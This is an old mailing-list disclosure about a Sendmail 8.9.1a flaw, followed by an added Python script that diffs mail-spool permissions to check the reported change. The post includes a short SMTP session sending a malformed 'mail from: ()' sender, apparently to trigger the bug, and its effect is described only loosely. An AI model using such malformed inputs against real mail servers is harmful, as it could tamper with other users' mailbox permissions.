`Date: Thu, 24 Sep 1998 10:14:06 -0400
From: Simon Smith <[email protected]>
This is not the same attack as the last one regarding the "(".
This one does not make your system hang but rather alters permissions, it
seems. If this was already posted please disregard it.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security
flaw in it. I have tested this on Debian Linux. I have not had time to
hack the source and find out where the hole is. (Yes I am going to give
notice to sendmail.) I have not determined if other systems are open to
this attack, but to check, create a user that you can eliminate.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
begin exploit
*****
bogin:~$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400
mail from: ()
250 MAILER-DAEMON... Sender ok
rcpt to: tester
250 tester... Recipient ok
data
354 Enter mail, end with "." on a line by itself
bababababa
.
250 JAA15070 Message accepted for delivery
quit
221 bogin.ma.ultranet.com closing connection
Connection closed by foreign host.
bogin:~$ su - tester
Password:
bogin:~$ pine
*****
end exploit
That is not the least of it. The mail was sent to tester, but watch what
happens if I read the mail,
then use pine to check e-mail.
I get the following message inside of pine:
"Mailbox vulnerable - directory must have 1777 protection "
Downgrading to a preliminary version of sendmail will stop this from
happening to you (8.8.8). If someone were to transmit mail to
[email protected] you would be condemned.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Hmmm it was not like that before.
I am still able to read the email.. but this causes problems..
I apologize that I did not take this any farther. If anyone wants to dig
into this please notify me of your findings
Sincerely,
SIMON
p.s. if this is an old bug please tell me and forward me the details...
not sure how it could be though seeing as it is the alpha release.... =oP
`
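An added example, not part of the original message: one way for an administrator to verify the permission change the post reports is to snapshot mode and ownership of the mail spool directory and its mailboxes before and after delivering a test message, then diff the two. The function names are hypothetical, and the demo runs against a constructed temporary directory in which the mode change is simulated.

```python
import os
import stat
import tempfile


def _mode(path):
    """Permission bits (including sticky/setuid/setgid) as a 4-digit octal string."""
    return format(stat.S_IMODE(os.lstat(path).st_mode), "04o")


def snapshot(spool_dir):
    """Map the spool directory and each entry in it to (mode, uid, gid)."""
    paths = [spool_dir] + sorted(
        os.path.join(spool_dir, name) for name in os.listdir(spool_dir)
    )
    snap = {}
    for path in paths:
        st = os.lstat(path)  # lstat: do not follow symlinks planted in the spool
        snap[path] = (_mode(path), st.st_uid, st.st_gid)
    return snap


def diff_snapshots(before, after):
    """Return (path, old, new) for every entry added, removed or changed."""
    changes = []
    for path in sorted(set(before) | set(after)):
        old, new = before.get(path), after.get(path)
        if old != new:
            changes.append((path, old, new))
    return changes


def spool_dir_ok(spool_dir, expected="1777"):
    """True if the directory has the mode pine's warning asks for."""
    return _mode(spool_dir) == expected


def demo():
    # Constructed stand-in for a real spool such as /var/spool/mail (assumption).
    with tempfile.TemporaryDirectory() as spool:
        os.chmod(spool, 0o1777)
        mailbox = os.path.join(spool, "tester")
        open(mailbox, "w").close()
        os.chmod(mailbox, 0o600)
        before = snapshot(spool)      # take this before sending the test mail
        os.chmod(spool, 0o755)        # simulated change; real runs deliver mail here
        after = snapshot(spool)       # take this after delivery and reading the mail
        return diff_snapshots(before, after), spool_dir_ok(spool)


if __name__ == "__main__":
    changes, ok = demo()
    for path, old, new in changes:
        print(f"{path}: {old} -> {new}")
    print("spool directory mode ok:", ok)
```

On a real host, call `snapshot()` on the system spool directory before and after the test delivery instead of using `demo()`.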